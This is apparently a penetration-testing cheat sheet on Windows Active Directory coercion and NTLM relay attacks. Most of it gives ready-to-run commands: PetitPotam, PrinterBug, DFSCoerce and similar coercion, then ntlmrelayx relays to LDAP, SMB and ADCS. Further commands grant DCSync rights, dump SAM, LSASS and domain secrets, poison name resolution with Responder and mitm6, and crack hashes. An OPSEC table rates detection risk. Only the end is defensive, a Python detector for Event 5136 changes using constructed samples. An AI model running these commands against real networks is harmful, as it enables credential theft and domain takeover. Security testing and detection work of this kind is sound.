Coercion and Relay Attacks
Force authentication from machines and relay captured credentials. PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, coercion to NTLM relay chains targeting LDAP, SMB, HTTP, and ADCS. Responder, ntlmrelayx, mitm6, and WPAD poisoning.
You have a network position between targets and want to force machines to authenticate to you, then relay that authentication to a service that accepts NTLM. Coercion triggers the authentication, relay redirects it. Together they chain into privilege escalation without cracking a single hash.
Coercion and Relay Overview
| Coercion Method | Protocol | Requires Auth | Target |
|---|---|---|---|
| PetitPotam | MS-EFSRPC | No (unpatched) / Yes (patched) | Any machine with EFS |
| PrinterBug (SpoolSample) | MS-RPRN | Yes | Any machine with Print Spooler |
| DFSCoerce | MS-DFSNM | Yes | Any machine with DFS |
| ShadowCoerce | MS-FSRVP | Yes | Machines with File Server VSS Agent |
| WebDAV + SearchConnector | HTTP | Yes | Machines with WebClient service |
| Relay Target | Port | What You Get | Requirement |
|---|---|---|---|
| LDAP/LDAPS | 389/636 | Modify AD objects (RBCD, Shadow Creds, DCSync ACL) | LDAP signing not enforced |
| SMB | 445 | Command execution, share access | SMB signing not required |
| HTTP (ADCS) | 80/443 | Request certificates as the relayed user | Web enrollment enabled |
| MSSQL | 1433 | SQL execution as relayed user | NTLM auth accepted |
Pre-Attack Checks
Before running any relay attack, verify that signing is not enforced on the target protocol.
LDAP Signing Check
# NetExec module
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M ldap-checker
# LdapRelayScan
root@localhost:~# python3 LdapRelayScan.py -method BOTH -dc-ip 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'
SMB Signing Check
# NetExec - generate relay target list (hosts without signing required)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' --gen-relay-list relay_targets.txt
# Nmap
root@localhost:~# nmap -p 445 --script smb2-security-mode 10.10.11.0/24
WebDAV Check
# Check which hosts have the WebClient service running
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdav
Coercion Methods
PetitPotam (MS-EFSRPC)
Abuses the Encrypting File System Remote Protocol to force a target to authenticate to your listener.
# Unauthenticated (pre-patch, CVE-2021-36942)
root@localhost:~# python3 PetitPotam.py 10.10.14.5 10.10.11.35
# Authenticated (works on patched systems)
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35
# Target a specific pipe
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local -pipe efsr 10.10.14.5 10.10.11.35
PrinterBug (MS-RPRN / SpoolSample)
Forces any machine with the Print Spooler service running to authenticate to you.
# Python version
root@localhost:~# python3 printerbug.py corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 10.10.14.5
# Dementor (alternative)
root@localhost:~# python3 dementor.py -d corp.local -u svc_backup -p 'P@ssw0rd123' 10.10.14.5 10.10.11.35
# SpoolSample (C#, run from Windows)
PS C:\> .\SpoolSample.exe dc01.corp.local 10.10.14.5
DFSCoerce (MS-DFSNM)
root@localhost:~# python3 DFSCoerce.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35
ShadowCoerce (MS-FSRVP)
root@localhost:~# python3 ShadowCoerce.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.35
Coercer (Multi-Method)
Wraps all known coercion methods into a single tool.
# Test all coercion methods
root@localhost:~# coercer coerce -u svc_backup -p 'P@ssw0rd123' -d corp.local -l 10.10.14.5 -t 10.10.11.35
# Scan for vulnerable endpoints first
root@localhost:~# coercer scan -u svc_backup -p 'P@ssw0rd123' -d corp.local -t 10.10.11.35
# Use a specific method
root@localhost:~# coercer coerce -u svc_backup -p 'P@ssw0rd123' -d corp.local -l 10.10.14.5 -t 10.10.11.35 --filter-method-name EfsRpcOpenFileRaw
Run coercer scan first to identify which methods work on the target, then use coercer coerce --filter-method-name with that specific method. This avoids unnecessary noise from failed attempts.
NTLM Relay with ntlmrelayx
Relay to LDAP (Set RBCD)
# Start ntlmrelayx targeting the DC's LDAP
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --delegate-access
# In another terminal, coerce the target
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local 10.10.14.5 10.10.11.40
# ntlmrelayx creates a computer account and sets RBCD automatically
# Complete the attack with S4U
root@localhost:~# impacket-getST corp.local/'YOURPC$':'<password_from_output>' -spn cifs/ws01.corp.local -impersonate Administrator -dc-ip 10.10.11.35
root@localhost:~# export KRB5CCNAME=Administrator@cifs_ws01.corp.local@CORP.LOCAL.ccache
root@localhost:~# impacket-psexec corp.local/Administrator@ws01.corp.local -k -no-pass
Relay to LDAP (Shadow Credentials)
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --shadow-credentials --shadow-target 'ws01$'
# After relay, use the generated certificate for PKINIT
root@localhost:~# python3 gettgtpkinit.py corp.local/'ws01$' ws01.ccache -cert-pfx ws01.pfx -pfx-pass <password>
root@localhost:~# export KRB5CCNAME=ws01.ccache
root@localhost:~# python3 getnthash.py -key <AS-REP-key> corp.local/'ws01$'
Relay to LDAP (Grant DCSync Rights)
root@localhost:~# impacket-ntlmrelayx -t ldap://10.10.11.35 --escalate-user svc_backup
# After relay, DCSync
root@localhost:~# impacket-secretsdump corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 -just-dc
Relay to SMB
# Relay for command execution
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "whoami > C:\Temp\relay_output.txt"
# Relay for interactive SMB shell
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i
# Connect: nc 127.0.0.1 11000
# Dump SAM from relayed targets
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sam
# Dump LSASS
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-lsass
Relay to ADCS (ESC8)
# Relay to ADCS HTTP endpoint to request a certificate
root@localhost:~# impacket-ntlmrelayx -t http://ca01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# After relay, authenticate with the captured certificate
root@localhost:~# certipy auth -pfx dc01.pfx -dc-ip 10.10.11.35
# Or use PKINITtools
root@localhost:~# python3 gettgtpkinit.py corp.local/'DC01$' dc01.ccache -cert-pfx dc01.pfx
root@localhost:~# export KRB5CCNAME=dc01.ccache
root@localhost:~# impacket-secretsdump corp.local/'DC01$'@dc01.corp.local -k -no-pass -just-dc
Responder (LLMNR/NBT-NS/mDNS Poisoning)
Responder poisons name resolution protocols to capture NTLM hashes from machines on the local network.
# Start Responder
root@localhost:~# sudo responder -I eth0 -wFb
# Analysis mode (passive, just listen)
root@localhost:~# sudo responder -I eth0 -A
# Hashes are saved to /usr/share/responder/logs/
Crack NTLMv2 Hashes
# Hashcat mode 5600
root@localhost:~# hashcat -m 5600 responder_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John
root@localhost:~# john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt responder_hashes.txt
Responder + ntlmrelayx Combo
Run Responder for poisoning and ntlmrelayx for relay simultaneously.
# Edit /etc/responder/Responder.conf
# Set SMB = Off and HTTP = Off (avoid port conflicts)
# Terminal 1: Responder
root@localhost:~# sudo responder -I eth0 -wFb
# Terminal 2: ntlmrelayx
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sam
mitm6 (IPv6 DNS Takeover)
Abuses the default Windows preference for IPv6 over IPv4. Responds to DHCPv6 requests and becomes the DNS server, allowing DNS redirection and NTLM capture.
# Terminal 1: Start mitm6
root@localhost:~# sudo mitm6 -d corp.local -i eth0
# Terminal 2: ntlmrelayx for LDAP relay
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://10.10.11.35 --delegate-access -wh wpad.corp.local
WebDAV-Based Coercion
With the WebClient service running, the coerced machine authenticates over HTTP (WebDAV) instead of SMB. HTTP NTLM authentication negotiates no signing, so it can be relayed to LDAP/LDAPS even where SMB signing on the coerced host would block the relay.
# Check for WebClient service
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdav
# Coerce via PetitPotam using WebDAV (HTTP-based)
# The @ syntax forces WebDAV instead of SMB
root@localhost:~# python3 PetitPotam.py -u svc_backup -p 'P@ssw0rd123' -d corp.local "10.10.14.5@80/test" 10.10.11.40
# Start WebClient service remotely (if installed but not running)
root@localhost:~# netexec smb 10.10.11.40 -u svc_backup -p 'P@ssw0rd123' -M webdav -o ACTION=start
OPSEC Comparison
| Technique | Network Noise | Detection Risk | Notes |
|---|---|---|---|
| Responder poisoning | Medium | Medium | Generates LLMNR/NBT-NS responses |
| mitm6 | Low-Medium | Medium | IPv6 traffic often not monitored |
| PetitPotam (unauth) | Low | Low | Single RPC call |
| PrinterBug | Low | Low | Normal print spooler RPC |
| NTLM relay to LDAP | Low | Medium | LDAP modification events (5136) |
| NTLM relay to SMB | Medium | High | Service creation, file writes |
| NTLM relay to ADCS | Low | Low | Normal certificate request |
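Detection side of the three LDAP relay outcomes above (RBCD via --delegate-access, Shadow Credentials via --shadow-credentials, DCSync ACL grant via --escalate-user), using the Event ID 5136 modifications the OPSEC table points at. This is an added example, not tooling from the page; events are dicts keyed by the 5136 EventData field names, and the sample records are constructed, not real telemetry.

```python
"""Flag 5136 directory modifications that match ntlmrelayx LDAP attack modes.
Events are dicts using 5136 EventData field names; samples are constructed."""
from typing import Optional

# Attribute written by each ntlmrelayx LDAP mode, with the label to report.
WATCHED_ATTRIBUTES = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD set (--delegate-access)",
    "msDS-KeyCredentialLink": "key credential added (--shadow-credentials)",
    "nTSecurityDescriptor": "domain ACL changed, possible DCSync grant (--escalate-user)",
}
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"


def classify_5136(event: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious 5136 event, or None if benign."""
    attr = event.get("LDAPDisplayName", "")
    if attr not in WATCHED_ATTRIBUTES or event.get("OperationType") != VALUE_ADDED:
        return None
    subject, object_dn = event.get("SubjectUserName", ""), event.get("ObjectDN", "")
    # ACL writes matter here only on the domain head, where DCSync rights live.
    if attr == "nTSecurityDescriptor" and not object_dn.upper().startswith("DC="):
        return None
    reasons = [WATCHED_ATTRIBUTES[attr]]
    # A relayed machine account ends up writing to its own computer object
    # (WS01$ editing CN=WS01): the relay signature, not ordinary admin work.
    cn = object_dn.split(",", 1)[0].removeprefix("CN=")
    if subject.endswith("$") and subject[:-1].lower() == cn.lower():
        reasons.append("machine account wrote to its own object")
    severity = "high" if len(reasons) > 1 or attr == "nTSecurityDescriptor" else "medium"
    return {"severity": severity, "subject": subject, "object": object_dn, "reasons": reasons}


def scan_events(events: list) -> list:
    """Run classify_5136 over a batch and keep only the alerts."""
    return [a for a in map(classify_5136, events) if a]


SAMPLE_EVENTS = [  # constructed 5136 records, in arrival order
    {"SubjectUserName": "WS01$", "ObjectDN": "CN=WS01,OU=Workstations,DC=corp,DC=local",
     "LDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674"},
    {"SubjectUserName": "helpdesk.admin", "ObjectDN": "CN=WS01,OU=Workstations,DC=corp,DC=local",
     "LDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"SubjectUserName": "DC01$", "ObjectDN": "DC=corp,DC=local",
     "LDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"SubjectUserName": "helpdesk.admin", "ObjectDN": "CN=jdoe,OU=Users,DC=corp,DC=local",
     "LDAPDisplayName": "description", "OperationType": "%%14674"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["subject"], "->", alert["object"], alert["reasons"])
```

Auditing 5136 requires a SACL on the relevant objects (computer objects, the domain head); without it the events are never written, which is the first thing to verify before relying on this logic.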